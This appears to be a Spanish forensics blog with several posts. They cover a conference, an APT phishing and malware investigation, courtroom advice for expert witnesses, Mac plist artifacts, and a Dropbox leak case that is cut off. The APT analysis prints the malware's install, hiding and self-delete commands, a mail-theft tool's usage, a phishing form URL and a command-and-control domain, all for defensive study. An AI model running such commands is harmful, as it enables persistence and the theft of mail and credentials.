Este fin de semana se celebró la No cON Name (NcN), uno de los congresos más esperados (junto a la Rooted Con) en el que se congregan cientos de personas que nos dedicamos a la seguridad informática. Para mi es un evento especial dado que lo sigo desde sus comienzos y allí nos juntamos viejos/jovenes conocidos para debatir y compartir.

Mi intervención fue fugaz dado que llegue con el tiempo justo y me fui "cagando leches" dado que tenía un fuego que apagar. Espero que al año que viene me pueda quedar en todas las jornadas.

Mi conferencia trato sobre "Seguridad informática en entornos militares" un tema que me apasiona enormemente y mas enfocado a los entrenamientos CWID.

Por otro lado las conferencias debieron de ser una maravilla tal y como cuenta Lorenzo en su entrada en Security By Default y pronto (quizás la semana que viene) estén las presentaciones disponibles para todos.

Un congreso muy bien organizado y altamente recomendable para aprender y compartir.

Valga este post, para insistir que en España disponemos de muy buenos investigadores de seguridad informática y como los buenos futbolistas se están exportando fuera de nuestro país.

En cuanto a mi espero volver a vernos en el siguiente 'sarao' que no se si es el asegur@IT de Chema o el de ciber-policias o el congreso Xtreland, a buen seguro en alguno nos vemos.

Un ataque persistente (APT)

2011-09-09T13:00:00.000+02:00

Hola lectores,

Perdón por el retraso, es lo que hay, mucho trabajo y que no falte que estamos en crisis. :-)

Ha sido un verano movido con mis nuevas funciones y casi no he parado, motivo que hace que no pueda escribir con la misma frecuencia de antes. No obstante CONEXIONINVERSA siempre será un punto de encuentro donde exponer todo lo que aprendo, especialmente en aquellos casos divertidos y complejos y que puedan de alguna forma ayudar a todos los que os guste este maravilloso mundo del Análisis Forense Informático.

Hoy vamos a ver un ataque especifico, insidioso y pensado para hacer mucho daño.

Advance Persistent Threat

Es un concepto que muchos ya sabréis este se denomina APT que significa Advance Persistent Threat, que no es otra cosa que un nuevo vector de ataque que tiene un propósito definido y que su objetivo es abrir una brecha o fallo de seguridad sin que la empresa tenga constancia de que la tiene y de ahí robar la mayor información posible.

Es un tipo de ataque que se alarga en el tiempo y suele pasar inadvertido por usuarios y administradores de sistemas. Los atacantes suelen actuar en equipo y poseen altos conocimientos de seguridad informática. Muchos de estos ataques son financiados por gobiernos o el cibercrimen y tienen relaciones políticas, económicas o militares. Aquí interviene el dicho "la información es poder".

EL CASO

En el mes de Julio estuve colaborando con una compañía que de forma rutinaria descubrió con asombro que su empresa era objeto de un ataque APT.

Según me comentaba el cliente (una firma de alto prestigio internacional dedicada a la auditoría y consultoría) nada les hacia pensar que ellos mismos podrían ser objetivos de un ataque de esta magnitud. A día de hoy, los dirigentes de esta compañía no son capaces de cuantificar que y cuanto ha podido ser sustraído y que problemas les puede venir en el futuro.

Nuestro caso empieza con una simple alerta de un usuario (un directivo) que dice haber recibido un correo de un colaborador externo (de otro directivo) y en el que le solicitan que introduzca las credenciales de una cuenta de gmail (que el no dispone) para el acceso a unos documentos de Google Docs. Tras una revisión por parte de los administradores se detecta que han recibido cientos de correos dirigidos a empleados solicitando las claves de gmail de los usuarios.

Hasta aquí puede ser otro caso más de phising y los administradores podrían haber marcado el correo y 'santas pascuas', nadie se hubiera enterado, pero parece ser que muchos usuarios han introducido las claves y han abierto estos documentos, detectando más tarde como veremos que se han infectado con un curioso malware.

ANALISIS DEL ATAQUE:

Procedemos tras unos días de investigación, a revisar los correos que los usuarios han recibido.

Como decía anteriormente, las víctimas reciben un mensaje desde una dirección de email que aparentemente es de un estrecho colaborador de una de las empresas que forman este grupo empresarial y que evidentemente mas tarde se demostró que es falsa. El contenido del correo es un formulario que 'invita' a introducir las credenciales de 'gmail' para acceder a Google Docs con un sugerente contenido de correo con ficheros adjuntos de nombres "Technical_Airport_Docs.docx" "Report_confidential_employees.xls".

El formulario HTML está codificado en Base64 y las cabeceras del correo vienen a decir lo siguiente:

........................
Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])
    by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1
    for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400
Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])
    by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086
    for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400
Received: from web-server (unknown [122.146.219.130])
    by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42
    for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400
Date: Tue, 11 Jul 2011 12:32:11From: XXXXXXXXXXXXX
To: XXXXXXXXXX
Subject: Nueva documentación: Novedades
X-Mailer: Foxmail 6, 10, 201, 20 - Foxmail es muy utilizado en China para realizar ataques de phising
Mime-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: base64
X-AOL-SCOLL-SCORE: 1:2:254689392:93952408
X-AOL-SCOLL-URL_COUNT: 2
X-AOL-IP: 122.146.219.130 - Ubicado en Taipei en Taiwan
x-aol-global-disposition: G
X-AOL-SCOLL-SCORE: 1:2:278191424:93952408
X-AOL-SCOLL-URL_COUNT: 2
x-aol-sid: 3039ac1d33834e37e77f14f3

PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291bnQgYWN0
aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJyPg0KPG9s
Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFtb3Vu
dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2YgdGltZS48
L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJsZSBtZXNz
YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZyBmaWxl
LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2lvbnMs
IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGluIHRv
........truncado a proposito

La información nos indica:

Es decir el correo parece que tiene su origen desde Taiwan, ahora procedemos a ver el contenido del formulario 'html' previamente descodificado. Esta es la información que ofrece (en color rojo):

form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.lsbu.ac.uk/php4-cgiwrap/hscweb/cm/login.php" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false">{di=
v name=3D"gaia_loginbox">

--------------------------------

input name=3D"AGALX" value=3D"NIE34iN5DAAYY" type=3D"hidden">=20
 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text">{/td>

Una URL que apunta a un servidor web propiedad de London South Bank University y que nada tiene que ver con los dominios del cliente, revisando el dominio (lsbu.ac.uk), vemos que apunta a una dirección ubicada en Reino Unido. La pregunta es ¿Estará comprometido el servidor?

A continuación procedo a introducir en el formulario unas credenciales falsas de una cuenta que me he creado previamente en Gmail. También capturo el trafico para ver que información devuelve.

Si nos fijamos en la captura del tráfico, estamos mandando las claves al atacante y una vez enviadas nos dirige a una url de Google Docs. Lo curioso del tema es que es una url pública a la que se accede sin autenticación.

Como es de sospechar, hay muchas posibilidades de que nos encontremos con malware, o quizás algún 0 Day. En este punto 'clonamos' y virtualizamos el equipo windows de la persona que dio la alerta a los administradores con objeto de simular de forma precisa el entorno.

Tras iniciar el entorno virtual y ponernos a analizar el documento procedemos como medida cautelar a descargarlo y enviarlo a Virus Total, con nulos resultados.

En apariencia no hay malware (0 de 44 motores ), pero lo mejor es ejecutarlo y para ello vamos a proveernos de nuestras mejores tools de nuestra preciada caja de herramientas y añadiré las de Sysinternals con objeto de monitorizar lo que hace en nuestro entorno Windows. Os recomiendo la lectura del blog del grande Mark Russinovich el autor de Sysinternals sobre "Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1, 2, 3"y que podéis leer desde aquí.

Me dispongo a lanzar el documento y espero unos minutos para que en el mejor de los casos si es un malware le de tiempo al equipo infectarse tranquilamente. Esto es lo que ha ocurrido de una forma resumida.

El archivo '.docx' da un clásico error de 'runtime' como el siguiente:

Tal y como lo estamos monitorizando, se ha lanzado un proceso de nombre 'file.exe' y se ha creado un fichero '.html' en la siguiente ruta:

C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html

Revisando los strings del nuevo proceso apunta a que registra las pulsaciones del teclado. ¿será un keylogger?

El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat' y diversas librerías .dll y otros diversos ficheros 'html'.

En este momento hago un volcado de memoria utilizando Dumpit de la empresa MoonSols y cuyo fundador es el gran Matthieu Suiche.

DumpIt es una fusión de win32dd y win64dd en un único archivo ejecutable. Sólo un doble clic sobre el ejecutable es suficiente para generar una copia de la memoria física en el directorio actual.

Tras el análisis del fichero de memoria, utilizando las tools de Volatility procedo a extraer el proceso del fichero de memoria y enviarlo a Anubis (un analizador de binarios) confirmando que efectivamente se trata de un keylogger. (ver reporte aquí)

No obstante con objeto de comprobarlo y mirando tal y como indica el informe, efectivamente existe el fichero en la máquina clonada y el contenido de UpdaterInfo.dat contiene todo lo tecleado hasta el momento.

CONTINUAMOS...

Seguimos investigando y vemos que el proceso lanza una conexión a internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5 Red interior design company) y procede a la descarga de un fichero comprimido de nombre 'gamer.zip'

Este fichero se almacena en la carpeta 'temp' y contiene a su vez los siguientes ficheros:

iam.exe
iam.dll
m.exe
r.exe
y.exe
sas.bat

Los ficheros 'iam.exe' e 'iam.dll', son detectados por virustotal como herramientas de Hacking, el fichero 'y.exe' es detectado por 25 motores de 41 como malware y los demás archivos no son detectados por ninguno de los motores.

IAM.EXE - IAM.DLL

Los ficheros 'iam.exe' e 'iam.dll' no son exactamente malware y pertenecen a un conjunto de herramientas de la empresa CORE SECURITY. Estos ficheros (según se indica en la web) permite cambiar en memoria las credenciales NTLM asociados con la sesión actual de Windows, es decir el nombre de usuario, dominio y hashes.

Todo apunta a que este 'raro-ware' esta pensado para robar las credenciales de los usuarios.

M.EXE

'm.exe' es una variación de 'getmail' y sirve para recuperar mensajes de correo electrónico

He adjuntado los dos 'strings' de ambos, con objeto de ver si contiene algo interesante y vaya si lo tiene.

'm.exe' se puede utilizar para recuperar mensajes de correo electrónico de un servidor Exchange. El uso según los 'strings' es el siguiente:

Ejemplo:

%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp

%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

Es necesario especificar el nombre de usuario, nombre del servidor, rango de fechas y la ubicación donde guardar los correos robados. Una vez lanzado al servidor Exchange los mensajes de correo electrónico se convertirá en texto y archivos adjuntos guardados en carpetas.

R.EXE

El ejecutable 'r.exe' es el archivo 'rar.exe' de Winrar, dado que no tiene huella para comprobar su integridad, procedo a descargarlo y aplicar la huella en MD5 y SHA1 coincidiendo ambas dos y dado que no me fío vuelvo a pasarlo por Virustotal y varios analizadores de binarios. También comparo los strings, aparentemente es el mismo fichero.

Y.EXE

'y.exe' añade al sistema funcionalidades de rootkit, ya que registra los procesos que se ejecutan al iniciar el sistema, crea archivos en el directorio Windows, modifica partes del registro y sustituye comandos de sistema operativo.

Entre ellos crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat' a continuación se crea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con los posteriores comandos:

cmd /c attrib +h +s prxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 prxy.dll,RundllInstall
prxy.dll
cmd /c sas.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del sas.bat

PRXY.DLL

Creado por 'Y.EXE' parece que reemplaza el servicio legitimo BITs de windows ubicado en la siguiente rama del registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters

'prxy.dll' parece que permite la descarga de software sin que los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo estos permiten la entrada y salida de trafico hacia internet. (esto no lo tenemos claro todavía)

SAS.BAT

Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido.

Se puede apreciar que este fichero es parte de otro y que su objetivo es capturar hashes y contraseñas. Una vez las obtiene (al igual que los correos en formato texto) se propone a empaquetarlas en un archivo que no ofrezca sospechas como ~WRD0100.tmp. He de decir que no se han encontrado los ejecutables 'PWDumpx.exe'.

Si descomprimimos el archivo ~WRD0100.tmp nos encontramos con lo siguiente:

Un montón de correos electrónicos, presumiblemente lanzados por el ejecutable 'm.exe'

CONSIDERACIONES

Aunque no hemos realizado ingeniería inversa de la mayoría de los ejecutables (estamos todavía en ello) podemos determinar que disponemos de un montón de evidencias de que la empresa ha sido víctima presumiblemente de un ataque auto-dirigido.

¿QUE HA OCURRIDO?

Bueno aunque con este desglose todavía es pronto para dar unas conclusiones exactas de lo ocurrido, me atrevo a decir lo siguiente:

Los hackers, han lanzado un ataque auto-dirigido con objeto de comprometer las cuentas de Gmail y apoderarse de datos privados de los empleados de está empresa, (no me atrevo a decir con que objeto). Aprovechando el ataque han instalado (utilizando ingeniería social) desde un keylogger hasta un kit de herramientas para la elevación de permisos, obtención de documentos y correos electrónicos.

Por lo que parece no se sabe muy bien si esto ha llegado a funcionar, dado que parece que faltan ejecutables y todo apunta a que no estaba muy bien construido el malware, pero solo es una opinión y todavía faltan cosas por contrastar.

¿CONCLUSIONES?

En este punto surgen muchas dudas, por ejemplo ¿Como se envían los datos robados y a quien?. ¿porque quieren las cuentas de gmail de estos usuarios?, ¿Quien tiene este especial interés?, ¿Es alguien de dentro o de fuera?, ¿Desde cuanto tiempo llevan actuando?.

Stutnex dio la bandera de salida, fue famoso internacionalmente por su complejidad e innovación, pero la cuestión es ¿cuantos de estos ataques en menor medida pasan en las empresas?, un pendrive en la puerta de un bar donde vas a tomar café, ¿no lo 'enchufarías' para ver lo que hay?. ¿Miramos lo suficiente nuestros log's de sistemas y aplicaciones?, quizás llegado a este punto donde la tecnología es parte fundamental de nuestra vida, deberíamos de prestar especial atención a esas pequeñas cosas como un escaneo de red, tráfico que no solemos tener o una regla modificada.

Deberemos de pensar en cosas como SIEM y disponer de inteligencia en nuestros sistemas de información que informen ante una anomalía.

Todavía son muchas preguntas sin respuesta y en este instante mientras lees el post, en esta empresa (que sufre en silencio las hemorroides) siguen limpiando, revisando log's y actualizando políticas de contraseñas. También estamos haciendo el análisis forense y quedan muchas cosas por mirar.

Una cosa más y por último, a día de hoy, algo o alguien todavía entra en mi cuenta ficticia de Gmail.

Vamos que nos vamos...

2011-06-20T16:47:00.000+02:00

Hola lectores,

Bueno...empieza el verano, la noche de San Juan y desde ConexionInversa os digo que vamos de 'tour'.

Empezamos en A Coruña los días 22, 23 y 24 en el I Curso de Informática Forense, en esta conferencias nada más ni menos que doy dos charlas, una sobre malware y otra sobre un caso de pornografía infantil.

Seguimos en la siguiente semana, por cuarto año consecutivo se va a celebrar, durante los días 28, 29 y 30 de Junio, el Curso de Verano de Seguridad y Auditoría Informática, de nuevo, en laUniversidad Europea de Madrid. El día 28 hablaré de Malware para Mac OSX (si ese que no existe).

Estaré también y de forma oficial en la Noconname (NcN) dando una ponencia sobre entornos militares y prácticas de entrenamiento en seguridad informática, (no os lo perdáis).

Y ya por último en Agosto en la DFRWS 2011 Annual Conference, de New Orleans, con un tema de análisis de memoria ram.

No obstante seguiré comentando las jugadas desde el blog. Saludos...

Recomendaciones en un juicio

2011-06-04T19:40:00.000+02:00

Hola lectores,

Cada vez son más las causas e imputados que utilizan las nuevas tecnologías como medio de extorsión, acoso, robo o para delinquir. Internet es un medio que para muchos de los mortales es desconocido y que también permite el anonimato y por ende muchas mafias lo utilizan como medio para cometer fraude.

Este año está siendo para mí el año de los Juicios, prácticamente desde el mes de Enero no he parado de testificar en calidad de perito y testigo. En lo que llevamos de año va ganando los juicios por 'fuga de datos (robo de datos de clientes, programas, documentación)", "Pornografía infantil (producción y consumo)" e "intromisión a la privacidad de las personas (lectura de correos, usurpación de identidad, insultos, acoso)".

Tarde o temprano y dependiendo de la cuantía del fraude o delito y si se ha realizado un buen análisis o peritaje es más que probable que acabe en un Juzgado pendiente de resolución Judicial.

En este post, (que no va a ser técnico) quiero hablar de las cosas que uno debe de tener cuidado en un Juicio y lo digo por experiencia ya que me he llevado más de un "tirón de orejas".

El juez es la autoridad pública que sirve en un tribunal de justicia. También se caracteriza como la persona que resuelve una controversia o que decide el destino de un imputado, tomando en cuenta las evidencias o pruebas presentadas en un juicio.

Partiendo de "quien manda" en la sala y quien toma decisiones es aconsejable tener en cuentas las siguientes recomendaciones:

La puntualidad: Aquí no valen escusas, ya te han informado por activa y por pasiva con una carta certificada en la que se presenta un Policía Urbano o Municipal para entregártela en mano. No vale decir "no encontré aparcamiento" o "el tráfico era imposible". Os aseguro que son impasibles y a parte de la bronca puedes llevarte un susto económico. Normalmente es más fácil que el Juicio se retrase por ellos mismos que por ti, pero no lo pongas en prueba.

La vestimenta: Ves normal, tirando para "bien vestido", entre los procuradores, abogados y jueces ya nos tienen demonizados como "Frikis", no pienses que ir de negro o con un sombrero va a parecer que sabes más que nadie de seguridad. Es conveniente ir "duchado" y de "Sport Casual" o con un traje (puedes no llevar corbata). Digo esto ya que recuerdo que en un juicio se retraso (y menuda se la gastaba la Señora Juez) dado que uno de los muchos peritos que nos acompañaron en las pruebas tuvo que quitarse tal cantidad de anillos, pulseras y collares porque todos ellos "cantaban" en el control de acceso.

En otra ocasión el perito de la parte contraria tenía tal cantidad de piercings y tatuajes de colores por todo el cuerpo que parecía salido del mismo infierno, cada vez que hablaba, creo tener la sensación (que creo hablar por todos) que iba a realizar un conjuro y que moriríamos allí mismo. Si quería llamar la atención lo hizo.

No vayas de erudito: Cuando empiece tu exposición, se claro y didáctico, hazles entender a todos y comprender, no hables de algoritmos ni te metas en jardines de los que no sepas salir. No utilices tecnicismos, que si el HOST con DCHP que no le funciona el WINS, es porque el HAXOR hizo un DDOS. ¿ok?.
También recuerdo un caso en el que el 'erudito' de la parte contraria que tenía todos los máster del universo nos dio a todos una magistral clase de clave pública y privada que todavía están pensado los de la sala de que planeta han sacado a este. Es como si a mi padre le hablo en hexadecimal.

Tu NO decides: Evita dar conclusiones, no digas cosas como "está claro, yo pienso que es pederasta" o según las pruebas "está claro que 'pepito' ha defraudado". FAIL. Eso lo decide el Juez, es más se molestan y te puedes llevar una lección por decir quien tiene que decidir. También tienes que hablar cuando te lo digan, nunca grites ni te adelantes aunque te acusen de que el trabajo no esté bien realizado. Nunca hables al Juez salvo que este inicie la conversación o veas que hay un ambiente distendido. Si te hablan de usted tú te diriges de Señoría. Recuerdo otro caso en el que el Juez hablaba al perito de usted y este de tu. A la cuarta o quinta vez le llamo la atención y no se me olvidará nunca lo que le dijo: "Usted será experto de todo y veo por primera vez a un licenciado que ha suspendido la educación básica". En resumen se transparente.

Ves preparado y se un profesional: Si vives de esto, llévatelo todo documentado, repasa la línea de tiempo, al imputado y las pruebas, no dejes nada al azar. Cuando empezaba en esto, me paso a mí. Me deje las anotaciones del caso y tuve que tirar de memoria, me metí en un pozo dado que no recordaba muchas cosas hasta que el abogado me "tiro una cuerda". La Juez se dio cuenta y me "tiro de las orejas". Dije que jamás me pasaría y hasta el día de hoy así ha sido.

No pisar la manguera: En esta profesión todos los que nos dedicamos a seguridad, peritos y analistas somos bomberos y claro, entre bomberos no nos vamos a pisar la manguera ¿no? Nada de meternos con los peritos contrarios, ni con el trabajo que hayan realizado. Nosotros a lo nuestro, nuestro trabajo y evidencias, si lo hemos realizado bien no hay nada que temer. En el caso de que sea un contra informe habrá que rebatir con evidencias y no con suposiciones. Piensa que entre abogados aunque parezcan que estén en guerra se llevan bien y a unas malas ellos no pierden, negocian y santas pascuas, así que no te metas en su guerra. Recuerda hay una norma no escrita que indica que entre peritos de una y la otra parte no hemos de atacarnos, no incumplas la norma. Como mínimo en Juicio, luego discute lo que gustes.

Paciencia: Ya sé que es casi imposible, que llevas dos o tres horas escuchando a unos y a otros y que lo que más deseas es tomar unas cervezas y olvidarte del asunto o quizás abrir tu portátil y empezar a trabajar. ¡¡Pues no!! Conténtate con abrir el correo en tu móvil y eso si a escondidas y procura que no suene. Si suena la has cagado!

Pepinos asesinos (que están de moda): Cuidadin con las preguntas y acusaciones de los fiscales y abogados, uno de ellos en un juicio me soltó dos "pepinos asesinos “comento: "Demuestre la existencia de TCP/IP" y la otra no menos interesante "enumere los peligros de Internet". Toma ya, pensaba que tenía que hacerlo de forma alfabética! Ante estas preguntas no te pongas nervioso y ten paciencia y si no tiene solución dilo claro y conciso, en un caso dado puedes poner ejemplos de la vida mundana o del día a día.

No te impresiones: Escuches lo escuches, seguramente se convertirá en una anécdota en el momento que cruces la puerta del juzgado y te preguntaras "¿quien me manda a mi meterme en esto?". No te preocupes, una vez realizado una, todas son iguales.

Bueno, con estas y otras anécdotas, tengo para escribir un libro, pero ya debo uno al bueno de Chema Alonso, así que me voy a poner en ello. Eso es todo amigos!!

Forensics Mac OSX (plist vs Registry)

2011-05-25T22:15:00.000+02:00

Hola lectores,

Este post explora algunos de los lugares clave donde se puede encontrar información en una investigación sobre un Mac OSX

En el mundo que nos toca, los Macintosh se están convirtiendo en 'ordenadores' muy populares, como bien dice un amigo los Mac son divertidos. Por esta razón, es importante que los analistas forenses puedan entender dónde pueden encontrar información similar a la que ya existe en Windows.

Dentro de la estructura de ficheros de OSX nos encontramos con un juego muy interesante de ficheros llamados 'plist'

Archivos plist

En primer lugar, es importante saber lo que es una lista de propiedades (plist) y el tipo de información que se puede almacenar en su interior. Los desarrolladores de Apple describen el plist de la siguiente manera, "Es un conjunto de ficheros que organizan los datos en valores asociando varios tipos de objetos. Estos objetos contienen una lista de propiedades que permiten a dispositivos y programas funcionar de una manera muy eficiente." No queda muy claro ¿verdad?.

Yo diria que los ficheros 'plist' pueden ser considerados como el "Registro" para OSX. La información que se almacena en estos archivos es diferente para cada programa en el sistema. Cada uno contiene la configuración para el programa, que llama a la plist. Al igual que en Windows las entradas del Registro, si cambia un valor en el archivo, el programa se ejecutará de manera diferente.

Los Plists pueden estar en tres formatos diferentes, siendo lo normal que sean en XML. Este formato es más portátil y se pueden editar de forma manual. Los otros formatos están en binarios y ASCII. El formato binario se siguen utilizando hoy en día, pero rara vez se encuentra un plist con formato ASCII. Los Plists en formato binario se ejecutarán mas rápidamente si contiene una gran cantidad de valores.

Evidentemente, es muy incomodo de leer en este formato 'a pelo', por lo que el sistema operativo incorpora un editor propio para estos ficheros. En la siguiente pantalla tenemos un fichero 'a pelo' con TextEdit y el mismo abierto con la propia utilidad que viene en el sistema operativo

TIPOS DE PLIST

Autorun

En un Mac, la ubicación de esta información está en el fichero com.apple.loginitems.plist. En su mayor parte, cuando alguien instala un programa en una máquina Windows, el programa tiene una configuración predeterminada de inicio en el arranque. Por ejemplo una vez instalado el Messenger, este se iniciará automáticamente en el arranque a menos que le indiquen lo contrario. En Mac si uno quiere tener un inicio de un programa debe indicarle al programa que lo haga.

El fichero com.apple.loginitems.plist se puede encontrar en la siguiente ubicación: /usuario/LibraryPreferences/com.apple.loginitems.plist.

Documentos recientes

En Windows, el registro contiene las entradas de documentos usados más recientemente (MRU). El MRU es una lista de programas recientes y archivos accedidos. Además de la MRU, Windows tiene la entrada UserAssist. Esta entrada contiene información acerca de los programas más utilizado por un usuario. Estas entradas están cifradas con el algoritmo de ROT-13.

En el entorno Mac, estas listas son más limitadas. Se hayan dentro de la carpeta /usuario/Library/Preferences/com.apple.recentitems.plist. y por defecto, Mac OS X hace un seguimiento de los últimos 10 accesos

En la pantalla anterior se puede apreciar el nombre de los servidores "Windows 7", "Time Capsule" y el documento IRPF1.

Redes inalámbricas

El SSID o identificador de una conexión de red inalambrica se registra en Mac OSX. Esto puede incluir conexiones a los hotspots Wi-Fi o puntos de acceso similares. En el Registro de Windows, el SSID se almacena en una clave y la configuración, tales como la dirección IP, máscara de subred y otra información sobre una red particular, se almacena en otra clave.

Esto es similar en un Mac. Los dos plist a tener en cuenta se pueden encontrar en las siguientes ubicaciones:

hd/Library/ Preferences/SystemConfiguration/com.apple.airport.prefrences.plist
hd/Library/Preferences/SystemConfiguration/com.apple.network.identification.plist

Mediante el uso de estos archivos a la vez, se puede ver la última fecha en que el ordenador estaba conectado a esa red mirando el com.apple.airport.preferences.plist. Por ejemplo, la siguiente pantalla se puede ver la red WLAN_11 y parte de su contraseña, así como una red abierta de nombre eus-wireless.

Una vez que el analista tiene la fecha y hora puede ir a la plist de identificación de red. Allí se encontrará con más información acerca de la red, incluyendo: servidores DNS, dirección IP, la interfaz utilizada (por cable o inalámbrica), máscara de subred y el router. En la siguiente pantalla podemos apreciar los DNS's

Según los ficheros plist ubicados en la carpeta /hd/Library/Preferences/SystemConfiguration, el analista puede determinar cuando un sospechoso estaba conectado a una red. Se puede utilizar los servidores DNS para averiguar el ISP, así como la lista de redes y timestamp de accesos.

Los dispositivos que se han montado o detectado

En una máquina Windows cuando se inserta un dispositivo el número de serie para el dispositivo (si es USB) está registrado, por lo que es más fácil de probar que un determinado USB se conecta al ordenador del sospechoso. Algunos dispositivos USB no tienen un número de serie por lo que Windows crea una cadena aleatoria en lugar del número de serie.

En el Mac, el plist /usuario/Library/Preferences/com.apple.finder.plist, muestra todos los dispositivos como USB, ISO, CD, DVD o iPod, que están o se han conectado al ordenador.

Cuando un usuario descarga un programa en un Mac, un archivo con extensión DMG se abre con el fin de instalar el programa. Esto es equivalente a un EXE en Windows. En el Mac, estos archivos están montados para que el usuario vea el programa de instalación. También podemos con este 'plist' ver que ficheros DMG que se han montado (o instalado)

Este elemento lo suelo utilizar muy a menudo si el tema tiene que ver con licencias de software fraudulentas o violación de la propiedad intelectual y hablando de esto recuerdo un caso de un acusado que además de ser un amante de la música, guardaba todo tipo de imágenes con pornografía infantil dentro de un IPOD. En el siguiente plist nos detectaría esta información /usuario/Library/Preferences/com.apple.iPod.plist. Con este archivo, podemos verificar si el iPod se ha conectado a ese equipo.

Historial de Internet

Safari

Safari es el navegador de Internet que viene nativo en un Mac. En Windows, Internet Explorer dispone en el registro tres subclaves: principal, TypedURLs y directorio de descarga. En un Mac, Safari cuenta con una configuración similar. Estos archivos se encuentran en /usuario/Library/Caches/Safari.

En la siguiente pantalla y utilizando el programa Juicer se puede ver como ha regenerado la carpeta cache, reconstruyendo en formato de carpetas y añadiendo el fichero INDEX.HTML que contiene todas las imágenes.

Otro gran lugar para buscar evidencias es el historial del navegador. El plist que se encuentra en /usuario/ Library/ Safari/History.plist proporciona todos los detalles.

Otro archivo no menos interesante es el fichero downloads.plist que permite saber que ficheros se han descargado desde Safari

Aplicaciones

Al igual que en el mundo de Windows, cuando un usuario instala un programa, una carpeta, se crea para ese programa. En Windows, la carpeta se crea normalmente en archivos de programa, y contiene los archivos ejecutables y otros importantes como las DLL's o ficheros de parámetros.

En un Mac, el ejecutable se coloca en la carpeta de aplicaciones, y todos los demás archivos importantes que se necesitan para ejecutar el programa se colocan en la carpeta de Aplication support, que se encuentra a su vez en /usuario/Library/

En Windows, en su mayor parte, cuando un usuario desinstala un programa, todos los archivos y carpetas relacionadas con ese programa son posteriormente eliminados. En un Mac, esto no es cierto. Cuando un usuario desinstala o elimina un programa, todo lo que estamos haciendo es eliminar el ejecutable de la carpeta de aplicaciones. La carpeta de Aplication support seguirá conteniendo todos los archivos asociados con ese programa.

Resumiendo lo que hemos visto:

Autorun:/usuario/Library/Preferences/com.apple.loginitems.plist

Documentos recientes:/usuario/Library/Preferences/ com.apple.recentitems.plist

Redes inalámbricas:hd/Library/Preferences/SystemConfiguration/com.apple.airport.prefrences.plist hd/Library/Preferences/SystemConfiguration/com.apple.network.identification.plist

Dispositivos detectados/usuario/Library/Preferences/com.apple.finder.plist
/usuario/Library/Preferences/com.apple.iPod.plist

Historial de internetusuario/Library/Safari/History.plist
usuario/Library/Safari/downloads.plist

Aplicaciones
/usuario/Library/Aplication Support

Conclusiones:

Como comentaba al principio del post, el Mac está creciendo con una gran popularidad y es importante los que nos dedicamos al análisis forense y a la seguridad el estar al día sobre estos temas (Os recomiendo la lectura del blog Seguridad Apple), a buen seguro que nos encontraremos cada vez con más análisis de productos de Apple. (¿quien no tiene un iPad o un iphone en la empresa?)

Se que no he abordado otros ficheros plist, pero por no hacer extenso el post y como en el futuro pondré temas relacionados con Mac OSX a buen seguro que hablaremos de estos ficheros. Tengo un caso muy interesante de una denegación de servicio utilizando como Bots una red de Mac OSX, pero eso será más adelante...

Dónde estará mi carro...(Forensics DropBox)

2011-05-17T08:16:00.002+02:00

Hola lectores,

Ante todo pedimos disculpas por el retraso en el blog, la verdad que para mi han sido épocas de grandes cambios y muchos viajes, ante todo en el ámbito profesional, pero una vez todo establecido, continuemos con nuestros 'casos forenses', lo dicho espero que me disculpéis.

Emulando a la famosa canción que indica el título del post "mi carro me lo robaron, estando de romería!
". Quisiera en esta ocasión hablar de un caso de fuga de información de un empleado que utilizo el servicio de DropBox para subir ficheros propiedad de la empresa y por tanto constituyente de un posible delito de propiedad intelectual y revelación de datos confidenciales.

El caso es el siguiente:

